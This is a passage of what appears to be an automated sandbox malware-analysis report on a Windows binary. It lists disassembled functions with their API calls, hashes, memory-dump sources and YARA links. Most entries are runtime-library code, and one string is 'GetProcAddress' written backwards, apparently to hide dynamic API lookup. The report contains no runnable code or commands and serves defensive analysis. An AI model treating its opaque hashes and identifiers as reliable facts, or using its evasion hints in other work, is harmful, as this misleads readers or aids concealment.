                                                                                                                        • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                        • Instruction ID: 9e08aba2d6bbaca992b8505837648f657132a8ba1fc9cfba379819d2deff66f1
                                                                                                                        • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                        • Instruction Fuzzy Hash: 5361F571940305AFDB20DF69C880B9ABBF9EF04724F15906AE948EB2D1D7309D82CB90
                                                                                                                        Function 02DEF010 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02DEF03B
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 02DEF043
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02DEF0D1
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 02DEF0FC
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02DEF151
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                        • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                        • Instruction ID: 80fbbabc71c86abfdff8f63fb32be13a06971826a8e23fa4fbb1bc1dce2bb367
                                                                                                                        • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                        • Instruction Fuzzy Hash: 9041B334A002199FCF10EF68C844B9E7BB5EF44328F148165E9166B796D731DE15CF91
                                                                                                                        Function 02DC717F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02DC718C
                                                                                                                        • int.LIBCPMT ref: 02DC719F
                                                                                                                          • Part of subcall function 02DC4470: std::_Lockit::_Lockit.LIBCPMT ref: 02DC4481
                                                                                                                          • Part of subcall function 02DC4470: std::_Lockit::~_Lockit.LIBCPMT ref: 02DC449B
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02DC71DB
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02DC7201
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02DC721D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                        • String ID: P[G
                                                                                                                        • API String ID: 2536120697-571123470
                                                                                                                        • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                                        • Instruction ID: 3cd141f0646dda1bd3c2d8cd79a01cda4b941331f2aad65591f3c5d093e4bfcc
                                                                                                                        • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                                        • Instruction Fuzzy Hash: A311A231A0011AABCF04FBA4D8549EDB769DE40754F30405AE40667390EB74AF46CFA5
                                                                                                                        Function 02E0726B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                        • Instruction ID: b851ee0bb36155e4dc3238ae481e7320b34fa6b67d52685ab0300a9fbb3b3b9e
                                                                                                                        • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                        • Instruction Fuzzy Hash: 15115471581704A6D630BBB1CC49FDBF79E9F00700F40AC15B79A661E0D665FA964F50
                                                                                                                        Function 02DC7462 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02DC746F
                                                                                                                        • int.LIBCPMT ref: 02DC7482
                                                                                                                          • Part of subcall function 02DC4470: std::_Lockit::_Lockit.LIBCPMT ref: 02DC4481
                                                                                                                          • Part of subcall function 02DC4470: std::_Lockit::~_Lockit.LIBCPMT ref: 02DC449B
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02DC74BE
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02DC74E4
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02DC7500
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                        • String ID: H]G
                                                                                                                        • API String ID: 2536120697-1717957184
                                                                                                                        • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                                                                        • Instruction ID: d98f7312fa8b1568b873f5d1393d136584e2432eb3dc87a9874a1b0572aa13f3
                                                                                                                        • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                                                                        • Instruction Fuzzy Hash: 03114C3290451AABDF15FBA4D8549EDB77AEE40364F30405DD4066B390EB30AF06CFA1
                                                                                                                        Function 02D3AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D3AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D3AD59
                                                                                                                          • Part of subcall function 02D3AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D3AD7D
                                                                                                                          • Part of subcall function 02D3AD3C: GetModuleFileNameA.KERNEL32(02D30000,?,00000105), ref: 02D3AD98
                                                                                                                          • Part of subcall function 02D3AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D3AE2E
                                                                                                                        • CharToOemA.USER32(?,?), ref: 02D3AEFB
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02D3AF18
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D3AF1E
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,02D3AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D3AF33
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,02D3AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D3AF39
                                                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02D3AF5B
                                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02D3AF71
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 185507032-0
                                                                                                                        • Opcode ID: 353f8da1fa9c6cc3581266e121711ec0a7c6e3c9616bd30e3c8ceed9d0defe02
                                                                                                                        • Instruction ID: 841c61651770ba858cf9ecfff2b65c973af4b270f14e98880523c64d0f3ea7e8
                                                                                                                        • Opcode Fuzzy Hash: 353f8da1fa9c6cc3581266e121711ec0a7c6e3c9616bd30e3c8ceed9d0defe02
                                                                                                                        • Instruction Fuzzy Hash: D61170F2944200BED202FBA4CC85F9B77EDEB45740F804965B784D62D0DA75ED048BB6
                                                                                                                        Function 02DF0B8C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 02DF0D19
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DF0D35
                                                                                                                        • __allrem.LIBCMT ref: 02DF0D4C
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DF0D6A
                                                                                                                        • __allrem.LIBCMT ref: 02DF0D81
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DF0D9F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1992179935-0
                                                                                                                        • Opcode ID: 2e4d297f402c8918b91ec823193bf3dc59bf70e37f00d95da226e179a692f1e4
                                                                                                                        • Instruction ID: 994a50a201f95eb58411eb36d8f9308eba11d1cf0f40db0de67a1a2190bd6daf
                                                                                                                        • Opcode Fuzzy Hash: 2e4d297f402c8918b91ec823193bf3dc59bf70e37f00d95da226e179a692f1e4
                                                                                                                        • Instruction Fuzzy Hash: 37813B72A007069BD7649B78CC40B6AB3E9EF40729F26812AE615D77C5E771ED00CB98
                                                                                                                        Function 02DFA068 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
                                                                                                                        • Instruction ID: 6b5a89fbcf00acb0f70088e31cb10c6b63fddf7a2deb9571a7e23a1c99468d08
                                                                                                                        • Opcode Fuzzy Hash: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
                                                                                                                        • Instruction Fuzzy Hash: F951B0369042106FDB649F68D8807BAB7A9DF45364F37415AEF4D9B380EB329D01C7A8
                                                                                                                        Function 02DFC0CD Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4189289331-0
                                                                                                                        • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                                        • Instruction ID: d7c20ff6c9293404e403b1cb934c22cd9630f9a6b2fe999b32bb77c2e2895b3f
                                                                                                                        • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                                        • Instruction Fuzzy Hash: 07513232910209ABDBA4DB588C40FAD77A9DF49724F16421BEA19963D1DB31CD20CA7C
                                                                                                                        Function 02D3E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D3E625
                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D3E641
                                                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02D3E67A
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D3E6F7
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02D3E710
                                                                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 02D3E745
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 351091851-0
                                                                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                        • Instruction ID: 3fe41909586222387b3cdc787ab1a36d4409f8e509d375529551ae4639ff71f2
                                                                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                        • Instruction Fuzzy Hash: 6B51E87690122D9BCB23DB58C980BD9B3BDEF49300F0045E5EA48E7352DA70AF858F61
                                                                                                                        Function 02D33598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D335BA
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02D33609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D335ED
                                                                                                                        • RegCloseKey.ADVAPI32(?,02D33610,00000000,?,00000004,00000000,02D33609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D33603
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                        • API String ID: 3677997916-4173385793
                                                                                                                        • Opcode ID: 36f1b45551d5abb6c89c8f3bf791c5b0afc104859523676012e5b5446a6fec6e
                                                                                                                        • Instruction ID: 67191a06f55b87505d0a3b87b0d5c8244a7a2bb450b5011489b4b256150d079a
                                                                                                                        • Opcode Fuzzy Hash: 36f1b45551d5abb6c89c8f3bf791c5b0afc104859523676012e5b5446a6fec6e
                                                                                                                        • Instruction Fuzzy Hash: B501B975D40358BEEB52DB90DD02BB977ECEB08710F1045A1FA04D6780E6B49E14CAA9
                                                                                                                        Function 02D48274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: Kernel32$sserddAcorPteG
                                                                                                                        • API String ID: 667068680-1372893251
                                                                                                                        • Opcode ID: ea1300faae385f023e297f38bf4d2786d65c0f70951bca889cf03bc35498be07
                                                                                                                        • Instruction ID: d25250de8dea1f6486aacbf6cf489940b7336572fe06927e3f4667ae8e90dfed
                                                                                                                        • Opcode Fuzzy Hash: ea1300faae385f023e297f38bf4d2786d65c0f70951bca889cf03bc35498be07
                                                                                                                        • Instruction Fuzzy Hash: 31014F76A44344EFEB02EBA4EC51A9EB7EEEB89B40F514460A840D7740DA74AD04DA74
                                                                                                                        Function 02DFB50B Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                        • Instruction ID: 76d2e0aa2b25d81f30b37398ff8ab35982df008e990378e42c254018a25e565b
                                                                                                                        • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                        • Instruction Fuzzy Hash: 9B51C171A00704AFDB609F25C841B6A77F5EF48728F16456AEA09DB3A0E735DE01CF98
                                                                                                                        Function 02DFA628 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
